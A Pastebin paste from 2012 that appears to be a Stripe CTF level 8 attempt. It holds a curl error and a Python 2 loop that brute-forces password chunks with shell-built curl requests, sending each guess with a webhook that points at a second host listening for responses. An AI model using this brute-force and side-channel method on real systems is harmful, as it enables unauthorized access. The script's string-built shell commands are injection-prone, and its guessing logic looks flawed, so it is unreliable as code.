Advertisement
Guest User

Untitled

a guest
Aug 28th, 2012
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.57 KB | None | 0 0
  1. Error when executed: curl 'https://level08-4.stripe-ctf.com/user-stsqneospz/' -d '{"webhooks":["level
  2. 02-3.stripe-ctf.com:8010"],"password":"1657740000"}'
  3. curl: (1) Protocol 'https not supported or disabled in libcurl
  4. 1
  5.  
  6. import os
  7. url="https://level08-4.stripe-ctf.com/user-stsqneospz/"
  8. webhook='level02-3.stripe-ctf.com:8010'
  9. for passsection in xrange(0,1000):
  10. password='165774000%s'%str(passsection)
  11. data='{"webhooks":["%s"],"password":"%s"}'%(webhook,password);
  12. command="curl '%s' -d '%s'"%(url,data);
  13. print command
  14. res=os.system(command);
  15. print res;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement